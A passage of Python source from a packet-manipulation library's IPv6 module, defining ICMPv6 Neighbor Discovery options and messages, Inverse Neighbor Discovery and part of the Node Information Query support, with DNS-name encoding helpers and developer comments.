1758 # 21: Do Me, 

1759 # 22: Do Me, 

1760 23: "ICMPv6NDOptMAP", 

1761 24: "ICMPv6NDOptRouteInfo", 

1762 25: "ICMPv6NDOptRDNSS", 

1763 26: "ICMPv6NDOptEFA", 

1764 31: "ICMPv6NDOptDNSSL", 

1765 37: "ICMPv6NDOptCaptivePortal", 

1766 38: "ICMPv6NDOptPREF64", 

1767 } 

1768 

1769icmp6ndraprefs = {0: "Medium (default)", 

1770 1: "High", 

1771 2: "Reserved", 

1772 3: "Low"} # RFC 4191 

1773 

1774 

1775class _ICMPv6NDGuessPayload: 

1776 name = "Dummy ND class that implements guess_payload_class()" 

1777 

1778 def guess_payload_class(self, p): 

1779 if len(p) > 1: 

1780 return icmp6ndoptscls.get(orb(p[0]), ICMPv6NDOptUnknown) 

1781 

1782 

1783# Beginning of ICMPv6 Neighbor Discovery Options. 

1784 

1785class ICMPv6NDOptDataField(StrLenField): 

1786 __slots__ = ["strip_zeros"] 

1787 

1788 def __init__(self, name, default, strip_zeros=False, **kwargs): 

1789 super().__init__(name, default, **kwargs) 

1790 self.strip_zeros = strip_zeros 

1791 

1792 def i2len(self, pkt, x): 

1793 return len(self.i2m(pkt, x)) 

1794 

1795 def i2m(self, pkt, x): 

1796 r = (len(x) + 2) % 8 

1797 if r: 

1798 x += b"\x00" * (8 - r) 

1799 return x 

1800 

1801 def m2i(self, pkt, x): 

1802 if self.strip_zeros: 

1803 x = x.rstrip(b"\x00") 

1804 return x 

1805 

1806 

1807class ICMPv6NDOptUnknown(_ICMPv6NDGuessPayload, Packet): 

1808 name = "ICMPv6 Neighbor Discovery Option - Scapy Unimplemented" 

1809 fields_desc = [ByteField("type", 0), 

1810 FieldLenField("len", None, length_of="data", fmt="B", 

1811 adjust=lambda pkt, x: (2 + x) // 8), 

1812 ICMPv6NDOptDataField("data", "", strip_zeros=False, 

1813 length_from=lambda pkt: 

1814 8 * max(pkt.len, 1) - 2)] 

1815 

1816# NOTE: len includes type and len field. Expressed in unit of 8 bytes 

1817# TODO: Revoir le coup du ETHER_ANY 

1818 

1819 

1820class ICMPv6NDOptSrcLLAddr(_ICMPv6NDGuessPayload, Packet): 

1821 name = "ICMPv6 Neighbor Discovery Option - Source Link-Layer Address" 

1822 fields_desc = [ByteField("type", 1), 

1823 ByteField("len", 1), 

1824 MACField("lladdr", ETHER_ANY)] 

1825 

1826 def mysummary(self): 

1827 return self.sprintf("%name% %lladdr%") 

1828 

1829 

1830class ICMPv6NDOptDstLLAddr(ICMPv6NDOptSrcLLAddr): 

1831 name = "ICMPv6 Neighbor Discovery Option - Destination Link-Layer Address" 

1832 type = 2 

1833 

1834 

1835class ICMPv6NDOptPrefixInfo(_ICMPv6NDGuessPayload, Packet): 

1836 name = "ICMPv6 Neighbor Discovery Option - Prefix Information" 

1837 fields_desc = [ByteField("type", 3), 

1838 ByteField("len", 4), 

1839 ByteField("prefixlen", 64), 

1840 BitField("L", 1, 1), 

1841 BitField("A", 1, 1), 

1842 BitField("R", 0, 1), 

1843 BitField("res1", 0, 5), 

1844 XIntField("validlifetime", 0xffffffff), 

1845 XIntField("preferredlifetime", 0xffffffff), 

1846 XIntField("res2", 0x00000000), 

1847 IP6Field("prefix", "::")] 

1848 

1849 def mysummary(self): 

1850 return self.sprintf("%name% %prefix%/%prefixlen% " 

1851 "On-link %L% Autonomous Address %A% " 

1852 "Router Address %R%") 

1853 

1854# TODO: We should also limit the size of included packet to something 

1855# like (initiallen - 40 - 2) 

1856 

1857 

1858class TruncPktLenField(PacketLenField): 

1859 def i2m(self, pkt, x): 

1860 s = bytes(x) 

1861 tmp_len = len(s) 

1862 return s[:tmp_len - (tmp_len % 8)] 

1863 

1864 def i2len(self, pkt, i): 

1865 return len(self.i2m(pkt, i)) 

1866 

1867 

1868class ICMPv6NDOptRedirectedHdr(_ICMPv6NDGuessPayload, Packet): 

1869 name = "ICMPv6 Neighbor Discovery Option - Redirected Header" 

1870 fields_desc = [ByteField("type", 4), 

1871 FieldLenField("len", None, length_of="pkt", fmt="B", 

1872 adjust=lambda pkt, x: (x + 8) // 8), 

1873 MayEnd(StrFixedLenField("res", b"\x00" * 6, 6)), 

1874 TruncPktLenField("pkt", b"", IPv6, 

1875 length_from=lambda pkt: 8 * pkt.len - 8)] 

1876 

1877# See which value should be used for default MTU instead of 1280 

1878 

1879 

1880class ICMPv6NDOptMTU(_ICMPv6NDGuessPayload, Packet): 

1881 name = "ICMPv6 Neighbor Discovery Option - MTU" 

1882 fields_desc = [ByteField("type", 5), 

1883 ByteField("len", 1), 

1884 XShortField("res", 0), 

1885 IntField("mtu", 1280)] 

1886 

1887 def mysummary(self): 

1888 return self.sprintf("%name% %mtu%") 

1889 

1890 

1891class ICMPv6NDOptShortcutLimit(_ICMPv6NDGuessPayload, Packet): # RFC 2491 

1892 name = "ICMPv6 Neighbor Discovery Option - NBMA Shortcut Limit" 

1893 fields_desc = [ByteField("type", 6), 

1894 ByteField("len", 1), 

1895 ByteField("shortcutlim", 40), # XXX 

1896 ByteField("res1", 0), 

1897 IntField("res2", 0)] 

1898 

1899 

1900class ICMPv6NDOptAdvInterval(_ICMPv6NDGuessPayload, Packet): 

1901 name = "ICMPv6 Neighbor Discovery - Interval Advertisement" 

1902 fields_desc = [ByteField("type", 7), 

1903 ByteField("len", 1), 

1904 ShortField("res", 0), 

1905 IntField("advint", 0)] 

1906 

1907 def mysummary(self): 

1908 return self.sprintf("%name% %advint% milliseconds") 

1909 

1910 

1911class ICMPv6NDOptHAInfo(_ICMPv6NDGuessPayload, Packet): 

1912 name = "ICMPv6 Neighbor Discovery - Home Agent Information" 

1913 fields_desc = [ByteField("type", 8), 

1914 ByteField("len", 1), 

1915 ShortField("res", 0), 

1916 ShortField("pref", 0), 

1917 ShortField("lifetime", 1)] 

1918 

1919 def mysummary(self): 

1920 return self.sprintf("%name% %pref% %lifetime% seconds") 

1921 

1922# type 9 : See ICMPv6NDOptSrcAddrList class below in IND (RFC 3122) support 

1923 

1924# type 10 : See ICMPv6NDOptTgtAddrList class below in IND (RFC 3122) support 

1925 

1926 

1927class ICMPv6NDOptIPAddr(_ICMPv6NDGuessPayload, Packet): # RFC 4068 

1928 name = "ICMPv6 Neighbor Discovery - IP Address Option (FH for MIPv6)" 

1929 fields_desc = [ByteField("type", 17), 

1930 ByteField("len", 3), 

1931 ByteEnumField("optcode", 1, {1: "Old Care-Of Address", 

1932 2: "New Care-Of Address", 

1933 3: "NAR's IP address"}), 

1934 ByteField("plen", 64), 

1935 IntField("res", 0), 

1936 IP6Field("addr", "::")] 

1937 

1938 

1939class ICMPv6NDOptNewRtrPrefix(_ICMPv6NDGuessPayload, Packet): # RFC 4068 

1940 name = "ICMPv6 Neighbor Discovery - New Router Prefix Information Option (FH for MIPv6)" # noqa: E501 

1941 fields_desc = [ByteField("type", 18), 

1942 ByteField("len", 3), 

1943 ByteField("optcode", 0), 

1944 ByteField("plen", 64), 

1945 IntField("res", 0), 

1946 IP6Field("prefix", "::")] 

1947 

1948 

1949_rfc4068_lla_optcode = {0: "Wildcard requesting resolution for all nearby AP", 

1950 1: "LLA for the new AP", 

1951 2: "LLA of the MN", 

1952 3: "LLA of the NAR", 

1953 4: "LLA of the src of TrSolPr or PrRtAdv msg", 

1954 5: "AP identified by LLA belongs to current iface of router", # noqa: E501 

1955 6: "No preifx info available for AP identified by the LLA", # noqa: E501 

1956 7: "No fast handovers support for AP identified by the LLA"} # noqa: E501 

1957 

1958 

1959class ICMPv6NDOptLLA(_ICMPv6NDGuessPayload, Packet): # RFC 4068 

1960 name = "ICMPv6 Neighbor Discovery - Link-Layer Address (LLA) Option (FH for MIPv6)" # noqa: E501 

1961 fields_desc = [ByteField("type", 19), 

1962 ByteField("len", 1), 

1963 ByteEnumField("optcode", 0, _rfc4068_lla_optcode), 

1964 MACField("lla", ETHER_ANY)] # We only support ethernet 

1965 

1966 

1967class ICMPv6NDOptMAP(_ICMPv6NDGuessPayload, Packet): # RFC 4140 

1968 name = "ICMPv6 Neighbor Discovery - MAP Option" 

1969 fields_desc = [ByteField("type", 23), 

1970 ByteField("len", 3), 

1971 BitField("dist", 1, 4), 

1972 BitField("pref", 15, 4), # highest availability 

1973 BitField("R", 1, 1), 

1974 BitField("res", 0, 7), 

1975 IntField("validlifetime", 0xffffffff), 

1976 IP6Field("addr", "::")] 

1977 

1978 

1979class _IP6PrefixField(IP6Field): 

1980 __slots__ = ["length_from"] 

1981 

1982 def __init__(self, name, default): 

1983 IP6Field.__init__(self, name, default) 

1984 self.length_from = lambda pkt: 8 * (pkt.len - 1) 

1985 

1986 def addfield(self, pkt, s, val): 

1987 return s + self.i2m(pkt, val) 

1988 

1989 def getfield(self, pkt, s): 

1990 tmp_len = self.length_from(pkt) 

1991 p = s[:tmp_len] 

1992 if tmp_len < 16: 

1993 p += b'\x00' * (16 - tmp_len) 

1994 return s[tmp_len:], self.m2i(pkt, p) 

1995 

1996 def i2len(self, pkt, x): 

1997 return len(self.i2m(pkt, x)) 

1998 

1999 def i2m(self, pkt, x): 

2000 tmp_len = pkt.len 

2001 

2002 if x is None: 

2003 x = "::" 

2004 if tmp_len is None: 

2005 tmp_len = 1 

2006 x = inet_pton(socket.AF_INET6, x) 

2007 

2008 if tmp_len is None: 

2009 return x 

2010 if tmp_len in [0, 1]: 

2011 return b"" 

2012 if tmp_len in [2, 3]: 

2013 return x[:8 * (tmp_len - 1)] 

2014 

2015 return x + b'\x00' * 8 * (tmp_len - 3) 

2016 

2017 

2018class ICMPv6NDOptRouteInfo(_ICMPv6NDGuessPayload, Packet): # RFC 4191 

2019 name = "ICMPv6 Neighbor Discovery Option - Route Information Option" 

2020 fields_desc = [ByteField("type", 24), 

2021 FieldLenField("len", None, length_of="prefix", fmt="B", 

2022 adjust=lambda pkt, x: x // 8 + 1), 

2023 ByteField("plen", None), 

2024 BitField("res1", 0, 3), 

2025 BitEnumField("prf", 0, 2, icmp6ndraprefs), 

2026 BitField("res2", 0, 3), 

2027 IntField("rtlifetime", 0xffffffff), 

2028 _IP6PrefixField("prefix", None)] 

2029 

2030 def mysummary(self): 

2031 return self.sprintf("%name% %prefix%/%plen% Preference %prf%") 

2032 

2033 

2034class ICMPv6NDOptRDNSS(_ICMPv6NDGuessPayload, Packet): # RFC 5006 

2035 name = "ICMPv6 Neighbor Discovery Option - Recursive DNS Server Option" 

2036 fields_desc = [ByteField("type", 25), 

2037 FieldLenField("len", None, count_of="dns", fmt="B", 

2038 adjust=lambda pkt, x: 2 * x + 1), 

2039 ShortField("res", None), 

2040 IntField("lifetime", 0xffffffff), 

2041 IP6ListField("dns", [], 

2042 length_from=lambda pkt: 8 * (pkt.len - 1))] 

2043 

2044 def mysummary(self): 

2045 return self.sprintf("%name% ") + ", ".join(self.dns) 

2046 

2047 

2048class ICMPv6NDOptEFA(_ICMPv6NDGuessPayload, Packet): # RFC 5175 (prev. 5075) 

2049 name = "ICMPv6 Neighbor Discovery Option - Expanded Flags Option" 

2050 fields_desc = [ByteField("type", 26), 

2051 ByteField("len", 1), 

2052 BitField("res", 0, 48)] 

2053 

2054# As required in Sect 8. of RFC 3315, Domain Names must be encoded as 

2055# described in section 3.1 of RFC 1035 

2056# XXX Label should be at most 63 octets in length : we do not enforce it 

2057# Total length of domain should be 255 : we do not enforce it either 

2058 

2059 

2060class DomainNameListField(StrLenField): 

2061 __slots__ = ["padded"] 

2062 islist = 1 

2063 padded_unit = 8 

2064 

2065 def __init__(self, name, default, length_from=None, padded=False): # noqa: E501 

2066 self.padded = padded 

2067 StrLenField.__init__(self, name, default, length_from=length_from) 

2068 

2069 def i2len(self, pkt, x): 

2070 return len(self.i2m(pkt, x)) 

2071 

2072 def i2h(self, pkt, x): 

2073 if not x: 

2074 return [] 

2075 return x 

2076 

2077 def m2i(self, pkt, x): 

2078 x = plain_str(x) # Decode bytes to string 

2079 res = [] 

2080 while x: 

2081 # Get a name until \x00 is reached 

2082 cur = [] 

2083 while x and ord(x[0]) != 0: 

2084 tmp_len = ord(x[0]) 

2085 cur.append(x[1:tmp_len + 1]) 

2086 x = x[tmp_len + 1:] 

2087 if self.padded: 

2088 # Discard following \x00 in padded mode 

2089 if len(cur): 

2090 res.append(".".join(cur) + ".") 

2091 else: 

2092 # Store the current name 

2093 res.append(".".join(cur) + ".") 

2094 if x and ord(x[0]) == 0: 

2095 x = x[1:] 

2096 return res 

2097 

2098 def i2m(self, pkt, x): 

2099 def conditionalTrailingDot(z): 

2100 if z and orb(z[-1]) == 0: 

2101 return z 

2102 return z + b'\x00' 

2103 # Build the encode names 

2104 tmp = ([chb(len(z)) + z.encode("utf8") for z in y.split('.')] for y in x) # Also encode string to bytes # noqa: E501 

2105 ret_string = b"".join(conditionalTrailingDot(b"".join(x)) for x in tmp) 

2106 

2107 # In padded mode, add some \x00 bytes 

2108 if self.padded and not len(ret_string) % self.padded_unit == 0: 

2109 ret_string += b"\x00" * (self.padded_unit - len(ret_string) % self.padded_unit) # noqa: E501 

2110 

2111 return ret_string 

2112 

2113 

2114class ICMPv6NDOptDNSSL(_ICMPv6NDGuessPayload, Packet): # RFC 6106 

2115 name = "ICMPv6 Neighbor Discovery Option - DNS Search List Option" 

2116 fields_desc = [ByteField("type", 31), 

2117 FieldLenField("len", None, length_of="searchlist", fmt="B", 

2118 adjust=lambda pkt, x: 1 + x // 8), 

2119 ShortField("res", None), 

2120 IntField("lifetime", 0xffffffff), 

2121 DomainNameListField("searchlist", [], 

2122 length_from=lambda pkt: 8 * pkt.len - 8, 

2123 padded=True) 

2124 ] 

2125 

2126 def mysummary(self): 

2127 return self.sprintf("%name% ") + ", ".join(self.searchlist) 

2128 

2129 

2130class ICMPv6NDOptCaptivePortal(_ICMPv6NDGuessPayload, Packet): # RFC 8910 

2131 name = "ICMPv6 Neighbor Discovery Option - Captive-Portal Option" 

2132 fields_desc = [ByteField("type", 37), 

2133 FieldLenField("len", None, length_of="URI", fmt="B", 

2134 adjust=lambda pkt, x: (2 + x) // 8), 

2135 ICMPv6NDOptDataField("URI", "", strip_zeros=True, 

2136 length_from=lambda pkt: 

2137 8 * max(pkt.len, 1) - 2)] 

2138 

2139 def mysummary(self): 

2140 return self.sprintf("%name% %URI%") 

2141 

2142 

2143class _PREF64(IP6Field): 

2144 def addfield(self, pkt, s, val): 

2145 return s + self.i2m(pkt, val)[:12] 

2146 

2147 def getfield(self, pkt, s): 

2148 return s[12:], self.m2i(pkt, s[:12] + b"\x00" * 4) 

2149 

2150 

2151class ICMPv6NDOptPREF64(_ICMPv6NDGuessPayload, Packet): # RFC 8781 

2152 name = "ICMPv6 Neighbor Discovery Option - PREF64 Option" 

2153 fields_desc = [ByteField("type", 38), 

2154 ByteField("len", 2), 

2155 BitField("scaledlifetime", 0, 13), 

2156 BitEnumField("plc", 0, 3, 

2157 ["/96", "/64", "/56", "/48", "/40", "/32"]), 

2158 _PREF64("prefix", "::")] 

2159 

2160 def mysummary(self): 

2161 plc = self.sprintf("%plc%") if self.plc < 6 else f"[invalid PLC({self.plc})]" 

2162 return self.sprintf("%name% %prefix%") + plc 

2163 

2164# End of ICMPv6 Neighbor Discovery Options. 

2165 

2166 

2167class ICMPv6ND_RS(_ICMPv6NDGuessPayload, _ICMPv6): 

2168 name = "ICMPv6 Neighbor Discovery - Router Solicitation" 

2169 fields_desc = [ByteEnumField("type", 133, icmp6types), 

2170 ByteField("code", 0), 

2171 XShortField("cksum", None), 

2172 IntField("res", 0)] 

2173 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::2", "hlim": 255}} 

2174 

2175 

2176class ICMPv6ND_RA(_ICMPv6NDGuessPayload, _ICMPv6): 

2177 name = "ICMPv6 Neighbor Discovery - Router Advertisement" 

2178 fields_desc = [ByteEnumField("type", 134, icmp6types), 

2179 ByteField("code", 0), 

2180 XShortField("cksum", None), 

2181 ByteField("chlim", 0), 

2182 BitField("M", 0, 1), 

2183 BitField("O", 0, 1), 

2184 BitField("H", 0, 1), 

2185 BitEnumField("prf", 1, 2, icmp6ndraprefs), # RFC 4191 

2186 BitField("P", 0, 1), 

2187 BitField("res", 0, 2), 

2188 ShortField("routerlifetime", 1800), 

2189 IntField("reachabletime", 0), 

2190 IntField("retranstimer", 0)] 

2191 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} 

2192 

2193 def answers(self, other): 

2194 return isinstance(other, ICMPv6ND_RS) 

2195 

2196 def mysummary(self): 

2197 return self.sprintf("%name% Lifetime %routerlifetime% " 

2198 "Hop Limit %chlim% Preference %prf% " 

2199 "Managed %M% Other %O% Home %H%") 

2200 

2201 

2202class ICMPv6ND_NS(_ICMPv6NDGuessPayload, _ICMPv6, Packet): 

2203 name = "ICMPv6 Neighbor Discovery - Neighbor Solicitation" 

2204 fields_desc = [ByteEnumField("type", 135, icmp6types), 

2205 ByteField("code", 0), 

2206 XShortField("cksum", None), 

2207 IntField("res", 0), 

2208 IP6Field("tgt", "::")] 

2209 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} 

2210 

2211 def mysummary(self): 

2212 return self.sprintf("%name% (tgt: %tgt%)") 

2213 

2214 def hashret(self): 

2215 return bytes_encode(self.tgt) + self.payload.hashret() 

2216 

2217 

2218class ICMPv6ND_NA(_ICMPv6NDGuessPayload, _ICMPv6, Packet): 

2219 name = "ICMPv6 Neighbor Discovery - Neighbor Advertisement" 

2220 fields_desc = [ByteEnumField("type", 136, icmp6types), 

2221 ByteField("code", 0), 

2222 XShortField("cksum", None), 

2223 BitField("R", 1, 1), 

2224 BitField("S", 0, 1), 

2225 BitField("O", 1, 1), 

2226 XBitField("res", 0, 29), 

2227 IP6Field("tgt", "::")] 

2228 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} 

2229 

2230 def mysummary(self): 

2231 return self.sprintf("%name% (tgt: %tgt%)") 

2232 

2233 def hashret(self): 

2234 return bytes_encode(self.tgt) + self.payload.hashret() 

2235 

2236 def answers(self, other): 

2237 return isinstance(other, ICMPv6ND_NS) and self.tgt == other.tgt 

2238 

2239# associated possible options : target link-layer option, Redirected header 

2240 

2241 

2242class ICMPv6ND_Redirect(_ICMPv6NDGuessPayload, _ICMPv6, Packet): 

2243 name = "ICMPv6 Neighbor Discovery - Redirect" 

2244 fields_desc = [ByteEnumField("type", 137, icmp6types), 

2245 ByteField("code", 0), 

2246 XShortField("cksum", None), 

2247 XIntField("res", 0), 

2248 IP6Field("tgt", "::"), 

2249 IP6Field("dst", "::")] 

2250 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} 

2251 

2252 

2253# ICMPv6 Inverse Neighbor Discovery (RFC 3122) # 

2254 

2255class ICMPv6NDOptSrcAddrList(_ICMPv6NDGuessPayload, Packet): 

2256 name = "ICMPv6 Inverse Neighbor Discovery Option - Source Address List" 

2257 fields_desc = [ByteField("type", 9), 

2258 FieldLenField("len", None, count_of="addrlist", fmt="B", 

2259 adjust=lambda pkt, x: 2 * x + 1), 

2260 StrFixedLenField("res", b"\x00" * 6, 6), 

2261 IP6ListField("addrlist", [], 

2262 length_from=lambda pkt: 8 * (pkt.len - 1))] 

2263 

2264 

2265class ICMPv6NDOptTgtAddrList(ICMPv6NDOptSrcAddrList): 

2266 name = "ICMPv6 Inverse Neighbor Discovery Option - Target Address List" 

2267 type = 10 

2268 

2269 

2270# RFC3122 

2271# Options requises : source lladdr et target lladdr 

2272# Autres options valides : source address list, MTU 

2273# - Comme precise dans le document, il serait bien de prendre l'adresse L2 

2274# demandee dans l'option requise target lladdr et l'utiliser au niveau 

2275# de l'adresse destination ethernet si aucune adresse n'est precisee 

2276# - ca semble pas forcement pratique si l'utilisateur doit preciser toutes 

2277# les options. 

2278# Ether() must use the target lladdr as destination 

2279class ICMPv6ND_INDSol(_ICMPv6NDGuessPayload, _ICMPv6): 

2280 name = "ICMPv6 Inverse Neighbor Discovery Solicitation" 

2281 fields_desc = [ByteEnumField("type", 141, icmp6types), 

2282 ByteField("code", 0), 

2283 XShortField("cksum", None), 

2284 XIntField("reserved", 0)] 

2285 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} 

2286 

2287# Options requises : target lladdr, target address list 

2288# Autres options valides : MTU 

2289 

2290 

2291class ICMPv6ND_INDAdv(_ICMPv6NDGuessPayload, _ICMPv6): 

2292 name = "ICMPv6 Inverse Neighbor Discovery Advertisement" 

2293 fields_desc = [ByteEnumField("type", 142, icmp6types), 

2294 ByteField("code", 0), 

2295 XShortField("cksum", None), 

2296 XIntField("reserved", 0)] 

2297 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} 

2298 

2299 

2300############################################################################### 

2301# ICMPv6 Node Information Queries (RFC 4620) 

2302############################################################################### 

2303 

2304# [ ] Add automatic destination address computation using computeNIGroupAddr 

2305# in IPv6 class (Scapy6 modification when integrated) if : 

2306# - it is not provided 

2307# - upper layer is ICMPv6NIQueryName() with a valid value 

2308# [ ] Try to be liberal in what we accept as internal values for _explicit_ 

2309# DNS elements provided by users. Any string should be considered 

2310# valid and kept like it has been provided. At the moment, i2repr() will 

2311# crash on many inputs 

2312# [ ] Do the documentation 

2313# [ ] Add regression tests 

2314# [ ] Perform test against real machines (NOOP reply is proof of implementation). # noqa: E501 

2315# [ ] Check if there are differences between different stacks. Among *BSD, 

2316# with others. 

2317# [ ] Deal with flags in a consistent way. 

2318# [ ] Implement compression in names2dnsrepr() and decompresiion in 

2319# dnsrepr2names(). Should be deactivable. 

2320 

2321icmp6_niqtypes = {0: "NOOP", 

2322 2: "Node Name", 

2323 3: "IPv6 Address", 

2324 4: "IPv4 Address"} 

2325 

2326 

2327class _ICMPv6NIHashret: 

2328 def hashret(self): 

2329 return bytes_encode(self.nonce) 

2330 

2331 

2332class _ICMPv6NIAnswers: 

2333 def answers(self, other): 

2334 return self.nonce == other.nonce 

2335 

2336# Buggy; always returns the same value during a session 

2337 

2338 

2339class NonceField(StrFixedLenField): 

2340 def __init__(self, name, default=None): 

2341 StrFixedLenField.__init__(self, name, default, 8) 

2342 if default is None: 

2343 self.default = self.randval() 

2344 

2345 

2346@conf.commands.register 

2347def computeNIGroupAddr(name): 

2348 """Compute the NI group Address. Can take a FQDN as input parameter""" 

2349 name = name.lower().split(".")[0] 

2350 record = chr(len(name)) + name 

2351 h = md5(record.encode("utf8")) 

2352 h = h.digest() 

2353 addr = "ff02::2:%2x%2x:%2x%2x" % struct.unpack("BBBB", h[:4]) 

2354 return addr 

2355 

2356 

2357# Here is the deal. First, that protocol is a piece of shit. Then, we 

2358# provide 4 classes for the different kinds of Requests (one for every 

2359# valid qtype: NOOP, Node Name, IPv6@, IPv4@). They all share the same 

2360# data field class that is made to be smart by guessing the specific 

2361# type of value provided : 

2362# 

2363# - IPv6 if acceptable for inet_pton(AF_INET6, ): code is set to 0, 

2364# if not overridden by user 

2365# - IPv4 if acceptable for inet_pton(AF_INET, ): code is set to 2, 

2366# if not overridden 

2367# - Name in the other cases: code is set to 0, if not overridden by user 

2368# 

2369# Internal storage, is not only the value, but the a pair providing 

2370# the type and the value (1 is IPv6@, 1 is Name or string, 2 is IPv4@) 

2371# 

2372# Note : I merged getfield() and m2i(). m2i() should not be called 

2373# directly anyway. Same remark for addfield() and i2m() 

2374# 

2375# -- arno 

2376 

2377# "The type of information present in the Data field of a query is 

2378# declared by the ICMP Code, whereas the type of information in a 

2379# Reply is determined by the Qtype" 

2380 

2381def names2dnsrepr(x): 

2382 """ 

2383 Take as input a list of DNS names or a single DNS name 

2384 and encode it in DNS format (with possible compression) 

2385 If a string that is already a DNS name in DNS format 

2386 is passed, it is returned unmodified. Result is a string. 

2387 !!! At the moment, compression is not implemented !!! 

2388 """ 

2389 

2390 if isinstance(x, bytes): 

2391 if x and x[-1:] == b'\x00': # stupid heuristic 

2392 return x 

2393 x = [x] 

2394 

2395 res = [] 

2396 for n in x: 

2397 termin = b"\x00" 

2398 if n.count(b'.') == 0: # single-component gets one more 

2399 termin += b'\x00' 

2400 n = b"".join(chb(len(y)) + y for y in n.split(b'.')) + termin 

2401 res.append(n) 

2402 return b"".join(res) 

2403 

2404 

2405def dnsrepr2names(x): 

2406 """ 

2407 Take as input a DNS encoded string (possibly compressed) 

2408 and returns a list of DNS names contained in it. 

2409 If provided string is already in printable format 

2410 (does not end with a null character, a one element list 

2411 is returned). Result is a list. 

2412 """ 

2413 res = [] 

2414 cur = b"" 

2415 while x: 

2416 tmp_len = orb(x[0]) 

2417 x = x[1:] 

2418 if not tmp_len: 

2419 if cur and cur[-1:] == b'.': 

2420 cur = cur[:-1] 

2421 res.append(cur) 

2422 cur = b"" 

2423 if x and orb(x[0]) == 0: # single component 

2424 x = x[1:] 

2425 continue 

2426 if tmp_len & 0xc0: # XXX TODO : work on that -- arno 

2427 raise Exception("DNS message can't be compressed at this point!") 

2428 cur += x[:tmp_len] + b"." 

2429 x = x[tmp_len:] 

2430 return res 

2431 

2432 

2433class NIQueryDataField(StrField): 

2434 def __init__(self, name, default): 

2435 StrField.__init__(self, name, default) 

2436 

2437 def i2h(self, pkt, x): 

2438 if x is None: 

2439 return x 

2440 t, val = x 

2441 if t == 1: 

2442 val = dnsrepr2names(val)[0] 

2443 return val 

2444 

2445 def h2i(self, pkt, x): 

2446 if x is tuple and isinstance(x[0], int): 

2447 return x 

2448 

2449 # Try IPv6 

2450 try: 

2451 inet_pton(socket.AF_INET6, x.decode()) 

2452 return (0, x.decode()) 

2453 except Exception: 

2454 pass 

2455 # Try IPv4 

2456 try: 

2457 inet_pton(socket.AF_INET, x.decode()) 

2458 return (2, x.decode()) 

2459 except Exception: 

2460 pass 

2461 # Try DNS 

2462 if x is None: 

2463 x = b"" 

2464 x = names2dnsrepr(x) 

2465 return (1, x) 

2466 

2467 def i2repr(self, pkt, x): 

2468 t, val = x 

2469 if t == 1: # DNS Name 

2470 # we don't use dnsrepr2names() to deal with 

2471 # possible weird data extracted info 

2472 res = [] 

2473 while val: 

2474 tmp_len = orb(val[0]) 

2475 val = val[1:] 

2476 if tmp_len == 0: 

2477 break 

2478 res.append(plain_str(val[:tmp_len]) + ".") 

2479 val = val[tmp_len:] 

2480 tmp = "".join(res) 

2481 if tmp and tmp[-1] == '.': 

2482 tmp = tmp[:-1] 

2483 return tmp 

2484 return repr(val) 

2485 

2486 def getfield(self, pkt, s): 

2487 qtype = getattr(pkt, "qtype") 

2488 if qtype == 0: # NOOP 

2489 return s, (0, b"") 

2490 else: 

2491 code = getattr(pkt, "code") 

2492 if code == 0: # IPv6 Addr 

2493 return s[16:], (0, inet_ntop(socket.AF_INET6, s[:16])) 

2494 elif code == 2: # IPv4 Addr 

2495 return s[4:], (2, inet_ntop(socket.AF_INET, s[:4])) 

2496 else: # Name or Unknown 

2497 return b"", (1, s) 

2498 

2499 def addfield(self, pkt, s, val): 

2500 if ((isinstance(val, tuple) and val[1] is None) or 

2501 val is None): 

2502 val = (1, b"") 

2503 t = val[0] 

2504 if t == 1: 

2505 return s + val[1] 

2506 elif t == 0: 

2507 return s + inet_pton(socket.AF_INET6, val[1]) 

2508 else: 

2509 return s + inet_pton(socket.AF_INET, val[1]) 

2510 

2511 

2512class NIQueryCodeField(ByteEnumField): 

2513 def i2m(self, pkt, x): 

2514 if x is None: 

2515 d = pkt.getfieldval("data") 

2516 if d is None: 

2517 return 1 

2518 elif d[0] == 0: # IPv6 address 

2519 return 0 

2520 elif d[0] == 1: # Name 

2521 return 1 

2522 elif d[0] == 2: # IPv4 address 

2523 return 2 

2524 else: 

2525 return 1 

2526 return x 

2527 

2528 

2529_niquery_code = {0: "IPv6 Query", 1: "Name Query", 2: "IPv4 Query"} 

2530 

2531# _niquery_flags = { 2: "All unicast addresses", 4: "IPv4 addresses", 

2532# 8: "Link-local addresses", 16: "Site-local addresses", 

2533# 32: "Global addresses" } 

2534 

2535# "This NI type has no defined flags and never has a Data Field". Used 

2536# to know if the destination is up and implements NI protocol. 

2537 

2538 

2539class ICMPv6NIQueryNOOP(_ICMPv6NIHashret, _ICMPv6): 

2540 name = "ICMPv6 Node Information Query - NOOP Query" 

2541 fields_desc = [ByteEnumField("type", 139, icmp6types), 

2542 NIQueryCodeField("code", None, _niquery_code), 

2543 XShortField("cksum", None), 

2544 ShortEnumField("qtype", 0, icmp6_niqtypes), 

2545 BitField("unused", 0, 10), 

2546 FlagsField("flags", 0, 6, "TACLSG"), 

2547 NonceField("nonce", None), 

2548 NIQueryDataField("data", None)] 

2549 

2550 

2551class ICMPv6NIQueryName(ICMPv6NIQueryNOOP): 

2552 name = "ICMPv6 Node Information Query - IPv6 Name Query" 

2553 qtype = 2 

2554 

2555# We ask for the IPv6 address of the peer 

2556 

2557 

2558class ICMPv6NIQueryIPv6(ICMPv6NIQueryNOOP): 

2559 name = "ICMPv6 Node Information Query - IPv6 Address Query" 

2560 qtype = 3 

2561 flags = 0x3E 

2562 

2563 

2564class ICMPv6NIQueryIPv4(ICMPv6NIQueryNOOP): 

2565 name = "ICMPv6 Node Information Query - IPv4 Address Query" 

2566 qtype = 4 

2567 

2568 

2569_nireply_code = {0: "Successful Reply", 

2570 1: "Response Refusal", 

2571 3: "Unknown query type"} 

2572 

2573_nireply_flags = {1: "Reply set incomplete", 

2574 2: "All unicast addresses", 

2575 4: "IPv4 addresses", 

2576 8: "Link-local addresses", 

2577 16: "Site-local addresses", 

2578 32: "Global addresses"} 

2579 

2580# Internal repr is one of those : 

2581# (0, "some string") : unknown qtype value are mapped to that one 

2582# (3, [ (ttl, ip6), ... ]) 

2583# (4, [ (ttl, ip4), ... ]) 

2584# (2, [ttl, dns_names]) : dns_names is one string that contains 

